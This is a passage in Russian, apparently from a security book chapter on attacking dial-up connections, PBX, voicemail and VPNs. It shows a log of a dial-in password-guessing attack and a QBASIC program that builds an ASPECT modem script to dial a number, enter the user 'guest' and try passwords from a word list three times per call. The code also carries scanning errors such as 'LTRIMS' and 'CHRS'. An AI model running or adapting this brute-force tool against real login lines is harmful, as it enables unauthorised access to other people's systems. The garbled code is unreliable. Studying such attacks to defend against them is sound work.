Уязвимость удаленных соединений, PBX, Voicemail и виртуальных частных сетей
Двойная идентификация, ограниченное число попыток
Четвертый домен является развитием третьего. Доя проникновения в систему четвертого домена требуется угадать имя пользователя и пароль при ограниченном числе попыток. После неудачного использования заданного числа попыток требуется восстановить разорванное соединение. Рассмотрим пример работы системы и программу генерации соответствующего сценария. В следующем листинге содержатся результаты атаки целевой системы.
XX-Jul-XX 09:55:08 91ХХХ5551234 С: CONNECT 9600/ARQ/V32/LAPM Username: guest Password: xxxxxxxx Username: guest Password: xxxxxxxx Username: gues.t Password: xxxxxxxx +++
А вот пример QBASIC-программы, генерирующей сценарий на языке ASPECT.
OPEN "5551235.was" FOR OUTPUT AS #2 OPEN "LIST.txt" FOR INPUT AS #1 PRINT #2, "proc main" DO UNTIL EOF(l) PRINT #2, "dial DATA " + CHR$(34) + "5551235" + CHR$(34) LINE INPUT #1, in$ in$ = LTRIMS(in$) + "ЛМ" PRINT #2, "waitfor " + CHR$(34) + " Username:" + CHR$(34) PRINT #2, "transmit " + CHR$(34) + " guest" + CHR$(34) PRINT #2, "waitfor " + CHR$(34) + " Password:" + CHR$(34) PRINT #2, "transmit " + CHR$(34) + in$ + CHR$(34) LINE INPUT #1, in$ in$ = LTRIM$(in$) + "ЛМ" PRINT #2, "waitfor " + CHR$(34) + " Username:" + CHR$(34) PRINT #2, "transmit " + CHR$(34) + " guest" + CHR$(34) PRINT #2, "waitfor " + CHR$(34) + " Password:" + CHR$(34) PRINT #2, "transmit " + CHR$(34) + in$ + CHRS(34) LINE INPUT #1, in$ in$ = LTRIM$(in$) + "AM" PRINT #2, "waitfor " + CHR$(34) + " Username:" + CHR$(34) PRINT #2, "transmit " + CHR$(34) + " guest" + CHR$(34) PRINT #2, "waitfor " + CHR$(34) + " Password:" + CHR$(34) PRINT #2, "transmit " + CHR$(34) + in$ + CHR$(34) LOOP PRINT #2, "endproc"